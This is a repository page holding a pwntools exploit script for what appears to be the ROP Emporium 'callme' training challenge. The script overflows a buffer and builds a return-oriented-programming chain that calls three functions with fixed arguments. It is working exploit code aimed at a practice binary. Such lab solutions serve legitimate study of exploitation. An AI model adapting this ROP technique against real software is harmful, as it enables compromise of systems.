indigo/rop
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
rop/x86_64/callme/exploit2.py
Brett Weiland 3f0a1e64c7 new file: x86_64/write4/exploit.py 
new file:   x86_64/write4/useful_gadgets
2020-12-16 17:45:09 -06:00

56 lines
986 B
Python
Executable File
Raw Blame History

#!/usr/bin/env python3
from pwn import *
usefulGadgets = p64(0x000000000040093c)
# pop rdi
# pop rsi
# pop rdx
# ret
arg1 = p64(0xdeadbeefdeadbeef)
arg2 = p64(0xcafebabecafebabe)
arg3 = p64(0xd00df00dd00df00d)
callme_1_plt = p64(0x0000000000400720)
callme_2_plt = p64(0x0000000000400740)
callme_3_plt = p64(0x00000000004006f0)
#jmp qword ptr [rbp]
#jmp rax
#jmp qword ptr [rax]
#pop rbp ; ret
#pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret <- change stack pointer to fin (or some other writable executable part)
prog = process('./callme')
payload = b''
for c in range(40):
payload += b'a'
payload += usefulGadgets
payload += arg1
payload += arg2
payload += arg3
payload += callme_1_plt
payload += usefulGadgets
payload += arg1
payload += arg2
payload += arg3
payload += callme_2_plt
payload += usefulGadgets
payload += arg1
payload += arg2
payload += arg3
payload += callme_3_plt
payload += b"\n"
prog.sendline(payload)
sleep(1)
print(str(prog.recv(), 'UTF-8'))
Reference in New Issue View Git Blame Copy Permalink